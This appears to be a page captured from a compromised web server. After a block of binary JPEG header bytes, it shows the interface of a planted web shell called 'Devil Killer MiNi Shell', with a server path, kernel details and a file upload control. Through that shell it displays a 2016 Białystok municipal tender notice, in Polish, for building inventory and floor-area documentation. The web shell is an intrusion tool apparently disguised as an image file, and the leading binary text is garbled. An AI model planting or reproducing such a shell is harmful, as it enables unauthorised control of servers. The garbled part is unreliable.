JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160126/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160126/9293-N-2016.html

<p class="kh_header"><b>Białystok: Opracowanie dokumentacji inwentaryzacji technicznej i operatorów inwentaryzacyjnych powierzchni użytkowej obiektów położonych w Białymstoku cz. I,</b><br>
<b>Numer ogłoszenia: 9293 - 2016; data zamieszczenia: 26.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zmk.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji inwentaryzacji technicznej i operatorów inwentaryzacyjnych powierzchni użytkowej obiektów położonych w Białymstoku cz. I,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowaniu dokumentacji inwentaryzacji technicznej i operatorów inwentaryzacyjnych powierzchni użytkowej obiektów położonych w Białymstoku cz. I, tj.:
Zadanie nr 1
1.	Opracowanie dokumentacji - inwentaryzacji technicznej  budynku położonego przy ul. Bema 2 	(przychodnia) w Białymstoku na działce 845/8 obręb 11. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 3665,59 m2. 
2.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Białówny 11 	(przychodnia) w Białymstoku na działce nr 1321/2 obręb 11. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 2543 m2. 
3.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Mieszka I 8C 	(przychodnia) w Białymstoku na działce nr 1095/129 obręb 17. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1483,91 m2. 
4.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Dobra 6 	(przychodnia) w Białymstoku na działce nr 1338/2 obręb 17. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 264,74 m2 +104,70 m2 (apteka). 
5.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy   Al. Piłsudskiego 	4A (przychodnia) w Białymstoku na działce nr 1254/5 obręb 11. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1285 m2.  
6.	Opracowanie dokumentacji - inwentaryzacji technicznej  budynku położonego przy ul. Sienkiewicza 	53/1 (przychodnia) w Białymstoku na działce 189/2 obręb 17. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1121,86 m2. 
7.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Sienkiewicza 	53B (przychodnia) w Białymstoku na działce nr 182 obręb 17. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 796,10 m2. 
Zadanie nr 2
1.	Opracowanie dokumentacji - inwentaryzacji technicznej  budynku położonego przy ul. Berlinga 8  	(przychodnia) w Białymstoku na działce 771/3 obręb 2. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 2622,30 m2. 
2.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Radzymińska 	16 (przychodnia) w Białymstoku na działce nr 573/1 obręb 12. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 2565,10m2. 
3.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Storczykowa 5 	(przychodnia) w Białymstoku na działce nr 3155/2 obręb 6. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1950,71 m2. 
4.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Storczykowa 7 	(przychodnia) w Białymstoku na działce nr 3155/2  obręb 6. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 615,51 m2.                   
5.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Swobodnej 24 	(przychodnia) w Białymstoku na działce nr 1754/4 obręb 2. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1527 m2.  
6.	Opracowanie dokumentacji - inwentaryzacji technicznej  budynku położonego przy ul. Siewna 2 	(przychodnia) w Białymstoku na działce 1096/5 obręb 16. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1424,39    m2. 
7.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Witosa 36 	(przychodnia) w Białymstoku na działce nr 657/36 obręb 4. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1876,98 m2. 
8.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Witosa 38 	(przychodnia) w Białymstoku na działce nr 657/36 obręb 4. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 592,72 m2.
Zadanie nr 3
1.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Przędzalnianej 4A w Białymstoku na działce 
nr 327/5 obręb 1. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 1719 m2.                                       Ilość lokali mieszkalnych - 39
2.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Sienkiewicza 7A w Białymstoku na działce 
nr 1410 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 790,90 m2.                               Ilość lokali mieszkalnych - 18.
Zadanie nr 4
1.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy Al. Piłsudskiego 8 w Białymstoku na działce nr 1261 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 3059,93 m2. Ilość lokali mieszkalnych - 67 + 2 lokale użytkowe + 6 lokali zaadaptowanych.
2.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy Al. Piłsudskiego 12 w Białymstoku na działce nr 1278 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 3.162,93 m2. Ilość lokali mieszkalnych - 65 + 4 lokale zaadaptowane.
3.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Lipowej 12 w Białymstoku na działce nr 1320 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 3052,17 m2. Ilość lokali mieszkalnych - 51 + 4 lokale użytkowe.
4.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Skłodowskiej 7 w Białymstoku na działce nr 1816 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 2962,22 m2. Ilość lokali mieszkalnych - 62 + 1 lokal użytkowy.
5.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Sienkiewicza 6 w Białymstoku na działce nr 1477 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 2299,68 m2. Ilość lokali mieszkalnych - 37 + 6 lokali użytkowych.
6.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Nowy Świat 8 w Białymstoku na działce nr 1325 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych:  1303,36 m2. Ilość lokali mieszkalnych - 24.
7.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Grochowej 2 w Białymstoku na działce nr 1590/5 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 3.039,37 m2. Ilość lokali mieszkalnych - 51 + 4 lokale zaadaptowane, 9 lokali użytkowych.
8.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Waryńskiego 4 w Białymstoku na działce nr 1300/4 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 906,22 m2. Ilość lokali mieszkalnych - 11 + 2 lokale użytkowe.
9.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Proletariackiej 1 w Białymstoku na działce nr 120 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 1.693 m2. Ilość lokali mieszkalnych - 41+ 2 lokale zaadaptowane + 1 lokal użytkowy (adaptacja).


Zadanie nr 5
1.	Poprawienie projektu inwentaryzacji budowlanej budynku przy ul. Wołodyjowskiego 2/2 - pomiar kondygnacji piwnicznej z natury, wykonanie rzutu kondygnacji piwnicznej, wyliczenie udziałów 
w nieruchomości wspólnej z pomieszczeniami przynależnymi i bez pomieszczeń przynależnych. Powierzchnia użytkowa budynku : 1244,59 m2. Ilość lokali mieszkalnych - 27.
2.	 Wyliczenie udziałów we współwłasności nieruchomości wspólnej przy ul. Nowy Świat 14 
w Białymstoku na działce nr 1328 obręb 11 na podstawie posiadanej dokumentacji budynku (zwymiarowane  lokale i pomieszczenia  przynależne). Powierzchnia użytkowa budynku 1.076,20 m2. Ilość lokali mieszkalnych - 18 + 1 lokal użytkowy.
3.	Wyliczenie udziałów we współwłasności nieruchomości wspólnej przy ul. Tuwima 13  w Białymstoku na działce nr 395 obręb 3 na podstawie posiadanej dokumentacji budynku (zwymiarowane  lokale 
i pomieszczenia  przynależne). Powierzchnia użytkowa budynku: 2131,90 m2 Ilość lokali mieszkalnych - 48.

Szczegółowy opis przedmiotu zamówienia dot. zadań 1-5 został podany w  załączniku nr 1 do SIWZ.
 
2.	Zamawiający dopuszcza składanie ofert częściowych w zakresie zadań (części zamówienia) wydzielonych w rozdziale IV SIWZ Opis przedmiotu zamówienia. Zamawiający dopuszcza składanie ofert częściowych (zadanie nr 1 , zadanie nr 2, zadanie nr 3, zadanie nr 4, zadanie nr 5). Wykonawca może złożyć ofertę na jedno wybrane zadanie lub całość przedmiotu zamówienia składającego się z pięciu zadań..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał w niniejszym postępowaniu wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku. Wykonawca potwierdza spełnienie warunku przez złożenie oświadczenia z art. 22 ust.1 pkt 1-4 (zał.3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku. Wykonawca potwierdza spełnienie warunku przez złożenie oświadczenia z art. 22 ust.1 pkt 1-4 (zał.3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku. Wykonawca potwierdza spełnienie warunku przez złożenie oświadczenia z art. 22 ust.1 pkt 1-4 (zał.3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, tj.:
- przynajmniej jedną osobą zajmującą się pracami projektowymi posiadającą uprawnienia do projektowania w zakresie architektonicznym,

- przynajmniej jedną osobą posiadającą uprawnienia budowlane do projektowania 
w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych               i elektroenergetycznych,  

- przynajmniej jedną osobą posiadającą uprawnienia budowlane do projektowania 
w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,

- przynajmniej jedną osobą posiadającą uprawnienia zawodowe rzeczoznawcy majątkowego.

Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia , które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konferencji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku. Wykonawca potwierdza spełnienie warunku przez złożenie oświadczenia z art. 22 ust.1 pkt 1-4 (zał.3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.	Wykonawca, który wykazuje spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów:
1)	wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (art. 26 ust. 2b ustawy Pzp). Zamawiający żąda wypełnienia załącznika 
nr 8 do SIWZ. Dokument ten stanowi pisemne zobowiązanie tych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Zobowiązanie winno dotyczyć w szczególności:
a)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
2)	UWAGA! Pisemne zobowiązanie podmiotu trzeciego należy złożyć w formie oryginału lub notarialnie poświadczonej kopii,
3)	UWAGA! Zgodnie z brzmieniem art. 26 ust. 2e ustawy Pzp podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
8.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokumenty określone w rozdziale IX SIWZ 
pkt 3 ppkt 2.
2)	dokumenty określone w rozdziale IX SIWZ pkt 2 ppkt 1, 2 winien złożyć co najmniej jeden 
z wykonawców wspólnie ubiegających się o udzielenie zamówienia,
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale IX SIWZ pkt 1, oświadczenie o niepodleganiu wykluczeniu określone w rozdziale IX SIWZ pkt 3 ppkt 1 oraz oświadczenie z art. 26 ust. 2d ustawy Pzp określonego w rozdziale IX SIWZ pkt 9 ppkt 4 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu 
(w miejscu nazwa i adres  wykonawcy należy wpisać dane dotyczące poszczególnych członków konsorcjum lub spółki cywilnej) bądź każdy z wykonawców oddzielnie.
9.	Zamawiający wymaga także załączenia do oferty innych dokumentów:
1)	wypełniony formularz ofertowy - wg załączonego wzoru załącznik nr 2 do SIWZ, 
2)	pełnomocnictwo w oryginale albo notarialnie potwierdzonej kopii - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp,
3)	na podstawie art. 26 ust. 2b ustawy Pzp wykonawca składa pisemne zobowiązanie podmiotu trzeciego - w przypadku gdy podmiot trzeci udostępni swoje osoby zdolne do wykonania zamówienia , 
4)	na podstawie art. 26 ust. 2d ustawy Pzp wykonawca składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp albo informację o tym, że nie należy do tej grupy kapitałowej. Informację, iż wykonawca nie należy do tej samej grupy kapitałowej należy złożyć zgodnie z załącznikiem nr 4 do SIWZ (przepis art. 26 ust. 3 i 4 ustawy Pzp stosuje).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Kryterium - okres rękojmi - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 17
ZMIANA UMOWY 
1. Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem
nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień
publicznych.
2. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, w stosunku do treści oferty
Wykonawcy, w następującym zakresie i okolicznościach:
1)	strony dopuszczają możliwość przedłużenia terminu, o których mowa w § 2 o czas opóźnienia,
jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w:
uzasadnionych przypadkach niezależnych od Wykonawcy, spowodowanych między innymi
brakiem dostępu do lokalu Zamawiający dopuszcza możliwość zmiany terminu realizacji umowy o ustalony przez strony czas niezbędny do prawidłowego wykonania zamówienia. 
2)	zmiany wysokości wynagrodzenia, którym mowa w § 4 ust. 1 - w przypadku zmiany stawki VAT,
3)	zmiany obowiązujących przepisów prawa,
4)	Zamawiający może dokonać zmiany swoich przedstawicieli wykazanych w § 15,
5)	Wykonawca może dokonać zmiany swojego przedstawiciela wykazanych w § 15,
6)	zmiany Podwykonawcy robót, pod warunkiem wyrażenia zgody Zamawiającego na taką zmianę
